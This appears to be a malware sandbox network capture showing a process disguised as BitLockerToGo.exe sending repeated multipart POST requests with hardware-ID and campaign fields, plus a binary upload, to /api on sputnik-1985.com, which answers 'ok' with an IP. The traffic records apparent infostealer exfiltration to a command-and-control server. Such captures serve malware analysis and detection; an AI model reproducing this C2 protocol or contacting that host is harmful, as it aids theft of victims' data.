    server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1456&rtt_var=557&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1942781&cwnd=214&unsent_bytes=0&cid=e3ba36ac11e84630&ts=492&x=0"
2025-01-10 10:34:30 UTC | 252 | IN | Data Raw: 34 33 30 63 0d 0a 43 53 47 67 55 72 61 37 5a 35 43 5a 32 68 56 4e 47 77 73 36 7a 43 4a 48 77 30 71 38 6f 61 58 51 57 44 77 65 6e 66 76 31 35 35 4e 79 41 39 5a 77 6a 49 39 4c 73 75 71 2f 4e 33 64 39 61 6c 61 2f 52 32 76 68 4b 39 69 44 6e 37 59 35 55 47 33 34 31 39 65 52 2f 69 73 62 78 6a 50 61 79 41 4b 38 75 37 39 74 62 79 46 51 51 65 35 48 4b 65 46 77 6e 73 54 50 73 6a 6c 51 66 50 79 51 6d 70 66 2f 61 6b 6e 4d 4e 64 37 65 42 50 54 34 74 6e 67 6f 66 6d 35 62 70 6b 77 75 72 69 4c 52 67 34 6e 79 50 55 59 38 70 39 6d 34 67 75 64 6f 62 4d 45 68 33 5a 6b 61 76 4f 4c 34 63 43 4d 35 4d 52 69 74 52 79 57 76 4c 4e 6a 4b 7a 62 67 77 57 48 33 35 6b 59 57 4f 39 57 46 4a 77 6a 62 66 31 41 33 67 39 62 78 2f 49 33 68 6b 57 2b 34 4f 5a 61 59 77 6e 70 75 48 34 51
    Data Ascii: 430cCSGgUra7Z5CZ2hVNGws6zCJHw0q8oaXQWDwenfv155NyA9ZwjI9Lsuq/N3d9ala/R2vhK9iDn7Y5UG3419eR/isbxjPayAK8u79tbyFQQe5HKeFwnsTPsjlQfPyQmpf/aknMNd7eBPT4tngofm5bpkwuriLRg4nyPUY8p9m4gudobMEh3ZkavOL4cCM5MRitRyWvLNjKzbgwWH35kYWO9WFJwjbf1A3g9bx/I3hkW+4OZaYwnpuH4Q
2025-01-10 10:34:30 UTC | 1369 | IN | Data Raw: 68 64 62 65 36 4d 6d 70 58 33 4b 31 79 4d 4b 5a 54 65 43 62 4b 6a 2b 48 38 6a 64 32 78 62 6f 55 63 6b 6f 54 72 52 77 38 53 36 4d 6c 70 32 38 4a 61 59 69 2f 74 73 53 38 73 33 32 39 34 4e 39 50 53 37 4e 32 45 35 62 6b 44 75 47 47 57 42 4f 4e 33 41 30 37 38 72 48 6d 4f 78 67 4e 65 43 2f 53 73 62 67 6a 62 61 32 41 6a 79 36 62 42 38 4a 48 78 37 55 36 64 4e 4b 4b 45 6c 31 4d 7a 45 73 6a 31 55 64 76 43 54 6b 34 6a 38 62 55 50 43 63 4a 71 5a 41 75 71 37 34 44 63 4d 66 48 6c 66 6f 6c 5a 6e 6d 32 6a 42 6a 64 37 79 50 56 49 38 70 39 6d 66 67 50 4a 6f 53 4d 30 7a 33 4e 49 58 38 75 6d 2b 65 69 70 72 62 31 32 67 53 69 61 7a 49 74 44 46 78 4c 73 78 56 33 6e 34 6e 64 66 4c 73 57 78 62 67 6d 69 55 2b 41 6a 35 39 37 4a 67 4c 7a 6c 32 46 72 63 41 49 71 31 6f 68 6f 50 44 73
    Data Ascii: hdbe6MmpX3K1yMKZTeCbKj+H8jd2xboUckoTrRw8S6Mlp28JaYi/tsS8s3294N9PS7N2E5bkDuGGWBON3A078rHmOxgNeC/Ssbgjba2Ajy6bB8JHx7U6dNKKEl1MzEsj1UdvCTk4j8bUPCcJqZAuq74DcMfHlfolZnm2jBjd7yPVI8p9mfgPJoSM0z3NIX8um+eiprb12gSiazItDFxLsxV3n4ndfLsWxbgmiU+Aj597JgLzl2FrcAIq1ohoPDs
2025-01-10 10:34:30 UTC | 1369 | IN | Data Raw: 2f 6e 6f 2f 46 71 53 74 79 31 54 75 57 37 41 62 38 39 62 39 68 62 32 59 6e 51 65 35 48 4b 65 46 77 6e 73 37 50 74 7a 39 52 66 66 57 58 6b 6f 2f 39 59 30 33 42 49 74 76 64 42 66 37 7a 73 6e 6f 68 66 57 46 52 70 55 73 6a 6f 53 6e 55 67 34 6e 79 50 55 59 38 70 39 6d 6a 67 76 31 6d 54 49 41 46 31 39 63 4c 39 65 33 34 61 47 46 67 4b 56 2b 69 41 48 33 68 4a 4e 66 44 7a 4c 67 2b 58 6e 76 79 6e 4a 53 43 38 6d 5a 45 79 44 37 54 33 51 6e 37 39 72 35 33 4b 48 31 73 53 71 74 4a 4b 61 31 6f 6b 49 50 41 71 6e 6f 47 50 4e 43 65 67 59 62 65 61 46 4c 4c 63 4d 75 58 48 4c 4c 38 74 44 64 33 4f 57 35 64 70 6b 73 6a 71 53 6a 4d 78 73 6d 35 4f 31 52 36 2f 70 53 62 67 2f 46 71 51 38 51 38 31 4e 34 43 34 4f 6d 39 63 54 31 7a 4b 52 62 75 52 7a 33 68 63 4a 37 31 31 36 55 72 53 44
    Data Ascii: /no/FqSty1TuW7Ab89b9hb2YnQe5HKeFwns7Ptz9RffWXko/9Y03BItvdBf7zsnohfWFRpUsjoSnUg4nyPUY8p9mjgv1mTIAF19cL9e34aGFgKV+iAH3hJNfDzLg+XnvynJSC8mZEyD7T3Qn79r53KH1sSqtJKa1okIPAqnoGPNCegYbeaFLLcMuXHLL8tDd3OW5dpksjqSjMxsm5O1R6/pSbg/FqQ8Q81N4C4Om9cT1zKRbuRz3hcJ7116UrSD
2025-01-10 10:34:30 UTC | 1369 | IN | Data Raw: 6a 66 6c 6b 54 4d 59 2b 30 74 38 49 39 2f 53 79 5a 53 64 33 5a 46 4f 68 53 7a 65 68 4a 64 72 50 77 37 6f 78 56 44 79 78 32 5a 43 64 73 54 4d 44 39 7a 33 62 32 51 62 6b 75 36 63 35 4e 6a 6c 75 56 4f 34 59 5a 61 30 6d 33 73 7a 4c 76 6a 46 57 66 66 4f 58 6b 49 44 34 59 30 76 51 4d 64 44 52 42 50 7a 30 75 58 4d 71 66 47 31 66 71 6b 59 71 34 57 61 65 78 4e 2f 79 59 68 35 54 32 4b 7a 56 70 4d 73 72 58 49 77 70 6c 4e 34 4a 73 71 50 34 65 79 78 31 59 56 65 6f 53 53 6d 72 49 64 58 50 7a 4c 59 32 56 33 6e 35 6d 4a 4b 41 38 47 39 50 79 44 62 58 32 67 72 39 39 4c 41 33 59 54 6c 75 51 4f 34 59 5a 59 51 2f 31 63 33 42 38 69 55 51 5a 62 2b 65 6d 38 57 70 4b 30 2f 4c 4e 74 4c 63 43 66 50 39 73 48 49 6e 66 57 68 65 71 45 4d 71 70 53 33 66 7a 4d 4f 2b 4e 46 52 39 2f 70 57
    Data Ascii: jflkTMY+0t8I9/SyZSd3ZFOhSzehJdrPw7oxVDyx2ZCdsTMD9z3b2Qbku6c5NjluVO4YZa0m3szLvjFWffOXkID4Y0vQMdDRBPz0uXMqfG1fqkYq4WaexN/yYh5T2KzVpMsrXIwplN4JsqP4eyx1YVeoSSmrIdXPzLY2V3n5mJKA8G9PyDbX2gr99LA3YTluQO4YZYQ/1c3B8iUQZb+em8WpK0/LNtLcCfP9sHInfWheqEMqpS3fzMO+NFR9/pW
2025-01-10 10:34:30 UTC | 1369 | IN | Data Raw: 45 7a 47 4e 39 6a 66 43 76 54 36 76 58 30 6a 66 6d 78 54 6f 55 78 6c 37 32 6a 5a 32 34 66 71 65 6e 42 33 37 49 36 55 69 2f 70 39 57 49 49 76 6d 73 42 46 39 66 66 34 4c 32 39 36 59 6c 4f 71 51 43 6d 68 4c 4e 50 44 31 62 30 39 57 58 58 30 69 35 32 43 39 6d 42 4c 79 54 2f 53 79 77 6e 38 36 62 31 6c 50 54 6b 6e 47 4b 6c 59 5a 66 6c 6f 36 4d 54 58 6f 6a 6b 63 54 65 6d 61 67 59 37 38 5a 77 50 64 66 73 32 5a 41 76 36 37 34 44 63 70 64 6d 42 62 6f 55 45 73 72 53 58 62 79 73 4b 7a 50 46 70 32 39 5a 6d 52 67 2f 42 75 53 63 45 78 33 74 41 43 2b 76 79 37 5a 57 38 33 4b 56 2b 32 41 48 33 68 41 64 6e 52 79 61 4a 36 51 54 4c 6d 32 5a 43 4a 73 54 4d 44 78 6a 72 62 33 51 4c 2b 2f 62 31 78 49 6e 68 6d 57 61 35 50 49 61 6f 68 32 4d 4c 4b 74 7a 64 61 62 76 57 53 6d 49 6e 34
    Data Ascii: EzGN9jfCvT6vX0jfmxToUxl72jZ24fqenB37I6Ui/p9WIIvmsBF9ff4L296YlOqQCmhLNPD1b09WXX0i52C9mBLyT/Sywn86b1lPTknGKlYZflo6MTXojkcTemagY78ZwPdfs2ZAv674DcpdmBboUEsrSXbysKzPFp29ZmRg/BuScEx3tAC+vy7ZW83KV+2AH3hAdnRyaJ6QTLm2ZCJsTMDxjrb3QL+/b1xInhmWa5PIaoh2MLKtzdabvWSmIn4
2025-01-10 10:34:30 UTC | 1369 | IN | Data Raw: 58 65 31 41 62 39 2b 4b 70 32 4b 57 74 70 56 61 52 53 4c 36 6f 74 30 38 37 4b 73 54 78 59 64 2f 4f 4c 6e 6f 58 79 59 41 4f 4d 63 4e 50 42 52 61 71 37 6d 32 41 35 63 32 35 55 75 45 73 6b 6f 6a 37 54 30 34 66 38 65 6b 39 37 37 74 6e 50 6b 2b 46 38 52 4e 31 2b 7a 5a 6b 43 2f 72 76 67 4e 79 6c 77 62 31 2b 6f 54 6a 65 6b 4c 74 48 4d 7a 72 73 2b 56 6e 2f 2f 6e 5a 4f 43 39 47 68 50 79 54 66 58 31 67 48 37 39 62 46 34 62 7a 63 70 58 37 59 41 66 65 45 4a 78 63 44 4c 76 33 70 42 4d 75 62 5a 6b 49 6d 78 4d 77 50 4f 50 74 48 5a 44 2f 54 2f 76 58 45 6c 66 47 6c 54 72 55 38 68 70 79 7a 52 77 38 79 37 4f 31 68 35 39 5a 4b 52 69 50 4a 74 52 59 4a 2b 6c 4e 34 64 73 71 50 34 56 7a 52 30 5a 56 2f 75 58 32 75 34 61 4e 6e 50 68 2b 70 36 56 58 44 37 6e 70 65 49 38 6d 4e 47 78
    Data Ascii: Xe1Ab9+Kp2KWtpVaRSL6ot087KsTxYd/OLnoXyYAOMcNPBRaq7m2A5c25UuEskoj7T04f8ek977tnPk+F8RN1+zZkC/rvgNylwb1+oTjekLtHMzrs+Vn//nZOC9GhPyTfX1gH79bF4bzcpX7YAfeEJxcDLv3pBMubZkImxMwPOPtHZD/T/vXElfGlTrU8hpyzRw8y7O1h59ZKRiPJtRYJ+lN4dsqP4VzR0ZV/uX2u4aNnPh+p6VXD7npeI8mNGx
2025-01-10 10:34:30 UTC | 1369 | IN | Data Raw: 54 2f 2b 75 2f 4e 78 41 33 4b 55 44 75 47 47 57 55 4b 39 44 4e 77 4b 51 72 45 31 76 70 6b 35 43 56 39 6e 78 4d 67 6e 36 55 33 30 57 71 71 50 59 33 4b 32 67 70 41 50 34 53 66 76 52 37 69 5a 4f 56 72 58 52 48 50 4f 6e 5a 7a 39 65 2f 4b 31 47 43 61 4a 53 65 42 75 44 70 76 6e 51 35 65 69 35 6d 6b 47 63 2f 72 43 37 4a 30 76 6d 4d 50 55 52 78 2b 59 36 47 79 65 52 6f 54 63 77 33 77 70 6c 4c 73 76 54 34 4c 78 59 35 49 52 69 52 44 6d 57 35 61 49 61 44 38 72 45 30 55 48 76 70 69 4e 71 69 36 32 5a 46 31 53 47 55 6c 30 58 30 75 2b 41 6e 59 54 6c 74 53 65 34 59 64 66 4e 7a 69 35 43 51 34 6d 68 42 4d 75 62 5a 67 63 57 70 4f 51 32 43 49 70 53 42 52 62 58 34 71 6d 55 70 65 6e 39 62 36 58 34 62 6a 79 2f 59 78 73 43 69 65 48 42 33 36 35 37 58 79 37 46 6b 41 35 6f 4a 6c 4a
    Data Ascii: T/+u/NxA3KUDuGGWUK9DNwKQrE1vpk5CV9nxMgn6U30WqqPY3K2gpAP4SfvR7iZOVrXRHPOnZz9e/K1GCaJSeBuDpvnQ5ei5mkGc/rC7J0vmMPURx+Y6GyeRoTcw3wplLsvT4LxY5IRiRDmW5aIaD8rE0UHvpiNqi62ZF1SGUl0X0u+AnYTltSe4YdfNzi5CQ4mhBMubZgcWpOQ2CIpSBRbX4qmUpen9b6X4bjy/YxsCieHB3657Xy7FkA5oJlJ
2025-01-10 10:34:30 UTC | 1369 | IN | Data Raw: 2b 43 39 39 4e 79 6c 63 76 77 42 39 38 58 71 46 6c 70 54 6c 61 67 78 6a 73 59 44 58 6b 37 45 7a 45 59 78 77 78 70 6c 64 73 72 79 37 5a 54 31 2f 61 6b 36 74 42 78 75 66 44 39 44 45 78 71 51 71 53 58 4f 77 74 36 47 6b 7a 31 56 57 77 54 37 61 33 68 50 6a 75 2f 59 33 49 44 6b 78 59 65 34 49 5a 5a 35 6d 6e 74 75 48 36 6e 70 72 66 2f 47 58 6b 4a 50 67 4a 6d 54 4d 4e 39 58 50 46 65 58 30 39 31 6b 5a 57 43 6b 57 37 6b 5a 6c 2b 58 71 51 67 38 4f 6a 65 67 59 73 72 63 4c 43 31 71 59 37 45 64 31 2b 7a 5a 6b 54 73 71 50 71 4f 57 39 72 4b 51 44 75 42 79 61 7a 4f 74 6a 41 30 62 46 39 59 45 4c 59 6c 35 43 45 35 33 74 4f 7a 68 48 58 79 41 2f 4d 78 61 31 30 49 58 64 75 54 72 38 41 61 2b 45 6e 6e 70 76 2b 38 6e 49 65 51 37 48 5a 6a 38 57 70 4b 33 62 42 50 74 72 65 45 2b 4f
    Data Ascii: +C99NylcvwB98XqFlpTlagxjsYDXk7EzEYxwxpldsry7ZT1/ak6tBxufD9DExqQqSXOwt6Gkz1VWwT7a3hPju/Y3IDkxYe4IZZ5mntuH6nprf/GXkJPgJmTMN9XPFeX091kZWCkW7kZl+XqQg8OjegYsrcLC1qY7Ed1+zZkTsqPqOW9rKQDuByazOtjA0bF9YELYl5CE53tOzhHXyA/Mxa10IXduTr8Aa+Ennpv+8nIeQ7HZj8WpK3bBPtreE+O
2025-01-10 10:34:30 UTC | 1369 | IN | Data Raw: 45 64 58 64 62 78 48 4e 61 4a 71 38 73 54 4b 76 67 52 67 53 2b 36 65 68 38 66 58 61 46 58 42 63 4a 71 5a 48 62 4b 6a 2b 46 6f 39 66 6e 6c 62 37 47 77 69 72 43 53 65 33 49 6d 72 65 6b 67 38 70 38 72 5a 78 65 4d 72 47 34 4a 33 31 38 73 58 39 50 69 75 64 47 68 48 56 33 57 38 52 7a 57 69 61 75 2f 4f 77 36 51 76 58 57 7a 34 70 36 6d 6f 34 32 78 54 77 58 4c 78 34 30 66 44 37 62 74 33 49 58 34 70 46 75 35 59 5a 66 6c 6f 38 39 48 41 6f 6a 6b 63 57 63 58 62 70 70 50 79 61 30 33 46 63 4a 71 5a 43 62 4b 6a 2b 48 6f 39 66 6e 6c 62 34 6b 63 2f 70 6d 6a 42 6a 64 37 79 4c 42 34 6b 72 4e 66 58 6c 37 45 7a 41 34 55 2b 32 64 67 47 2f 50 69 71 5a 53 6c 36 66 31 76 70 66 68 75 4f 49 39 2f 54 79 71 4d 33 57 6d 72 42 70 37 43 44 39 47 78 39 2f 41 66 46 33 68 57 77 33 62 74 68
    Data Ascii: EdXdbxHNaJq8sTKvgRgS+6eh8fXaFXBcJqZHbKj+Fo9fnlb7GwirCSe3Imrekg8p8rZxeMrG4J318sX9PiudGhHV3W8RzWiau/Ow6QvXWz4p6mo42xTwXLx40fD7bt3IX4pFu5YZflo89HAojkcWcXbppPya03FcJqZCbKj+Ho9fnlb4kc/pmjBjd7yLB4krNfXl7EzA4U+2dgG/PiqZSl6f1vpfhuOI9/TyqM3WmrBp7CD9Gx9/AfF3hWw3bth


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49796 | 104.21.48.14 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:34:31 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=1HOV66FNDB7NHB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12818
Host: sputnik-1985.com
2025-01-10 10:34:31 UTC | 12818 | OUT | Data Ascii:
--1HOV66FNDB7NHB
Content-Disposition: form-data; name="hwid"

2C1B840C4ED5F58F4EC0E979F11769B5
--1HOV66FNDB7NHB
Content-Disposition: form-data; name="pid"

2
--1HOV66FNDB7NHB
Content-Disposition: form-data; name="lid"

HpOoIh--bd4e81951306
--1
2025-01-10 10:34:32 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:34:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=pvmaui4betlbe2f7m4hagi96vg; expires=Tue, 06 May 2025 04:21:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXGeP4Fl1k5PlgZFPG0l%2BLaoaq9sC4bbbUxHrGvuYY%2FommYferazbbfV%2B0%2F6U0S3PsuVaSsn7f%2FKCDpDiWMATv89lWWFtFiDMnPRlGW4q70zRFXMyOAv59skh6jmP%2BM8bJa8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc03dcbb49c461-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1581&rtt_var=608&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13754&delivery_rate=1778319&cwnd=228&unsent_bytes=0&cid=085369153f1f20da&ts=545&x=0"
2025-01-10 10:34:32 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-10 10:34:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49805 | 104.21.48.14 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:34:33 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GR9J0UZM8CJ54HBX912
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15090
Host: sputnik-1985.com
2025-01-10 10:34:33 UTC | 15090 | OUT | Data Ascii:
--GR9J0UZM8CJ54HBX912
Content-Disposition: form-data; name="hwid"

2C1B840C4ED5F58F4EC0E979F11769B5
--GR9J0UZM8CJ54HBX912
Content-Disposition: form-data; name="pid"

2
--GR9J0UZM8CJ54HBX912
Content-Disposition: form-data; name="lid"

HpOoIh--bd
2025-01-10 10:34:33 UTC | 1118 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:34:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ek1go8dpjibfrap205fluke684; expires=Tue, 06 May 2025 04:21:12 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jXoVrHKzuzmiCdKFeeBuGikeW08AeyeV2MVk5E3tXyPXVRfyhDwydzyCRSaNm0evb6siTKd33M3V76ALppibuVuR42Etpibu2c8ZjxC8ezgOoKuP3xskZoRTIe0lAKN53nH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc03e5c8438cda-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1943&rtt_var=764&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16031&delivery_rate=1399137&cwnd=243&unsent_bytes=0&cid=a15be5b69896ca35&ts=558&x=0"
2025-01-10 10:34:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-10 10:34:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 61984 | 104.21.48.14 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:34:34 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ZYZGZAHRUJ4BYWG
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20556
Host: sputnik-1985.com
2025-01-10 10:34:34 UTC | 15331 | OUT | Data Ascii:
--ZYZGZAHRUJ4BYWG
Content-Disposition: form-data; name="hwid"

2C1B840C4ED5F58F4EC0E979F11769B5
--ZYZGZAHRUJ4BYWG
Content-Disposition: form-data; name="pid"

3
--ZYZGZAHRUJ4BYWG
Content-Disposition: form-data; name="lid"

HpOoIh--bd4e81951306
2025-01-10 10:34:34 UTC | 5225 | OUT | Data Raw / Data Ascii: (binary payload, dump omitted)
2025-01-10 10:34:35 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:34:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qqafddt050rmr7n8moi8ucfpe1; expires=Tue, 06 May 2025 04:21:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3XaFeDiM%2F8kDgNi%2BpE9FPdnoJMxXlD2r3qAj6gBYbV0dAuY2fB%2B4FawGvn8j%2BuhcpnReJnsWXM2Is0y6vNCCH5YCa%2BL2l1mIjcaSVFAWX9aEXjpwSnnigyocgtV6BbMpJsk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc03edd803c461-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1558&rtt_var=597&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21515&delivery_rate=1811414&cwnd=228&unsent_bytes=0&cid=08f255db4e0d3b08&ts=633&x=0"
2025-01-10 10:34:35 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-10 10:34:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 62001 | 104.21.48.1 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:34:37 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=IBNC1KXRCOYG
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1217
Host: sputnik-1985.com
2025-01-10 10:34:37 UTC | 1217 | OUT | Data Raw: 2d 2d 49 42 4e 43 31 4b 58 52 43 4f 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 49 42 4e 43 31 4b 58 52 43 4f 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 42 4e 43 31 4b 58 52 43 4f 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 0d 0a 2d 2d 49 42 4e 43 31 4b 58
Data Ascii: --IBNC1KXRCOYGContent-Disposition: form-data; name="hwid"2C1B840C4ED5F58F4EC0E979F11769B5--IBNC1KXRCOYGContent-Disposition: form-data; name="pid"1--IBNC1KXRCOYGContent-Disposition: form-data; name="lid"HpOoIh--bd4e81951306--IBNC1KX
2025-01-10 10:34:38 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:34:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7oolv6g6mk0o0fnpgqunroasch; expires=Tue, 06 May 2025 04:21:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4h4Nvi97872I4j0d63xQG1xF4gJPwiQqiTF2FlLEeLz%2FtCHAAs2IvwqlsCzY8Fisn63xxQuqzjHOnUXKZ73SCUxmtHCYcceMYMMiZWSPQ6DG9WD2sT7SwS6%2BEhuZwKhvZ6t"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc03fdb8f18cda-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1863&rtt_var=712&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2128&delivery_rate=1521625&cwnd=243&unsent_bytes=0&cid=d5843d305f84670b&ts=1507&x=0"
2025-01-10 10:34:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-10 10:34:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 62017 | 104.21.48.1 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:34:39 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=G1ZN91Z2ZW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1079
Host: sputnik-1985.com
2025-01-10 10:34:39 UTC | 1079 | OUT | Data Raw: 2d 2d 47 31 5a 4e 39 31 5a 32 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 47 31 5a 4e 39 31 5a 32 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 31 5a 4e 39 31 5a 32 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 0d 0a 2d 2d 47 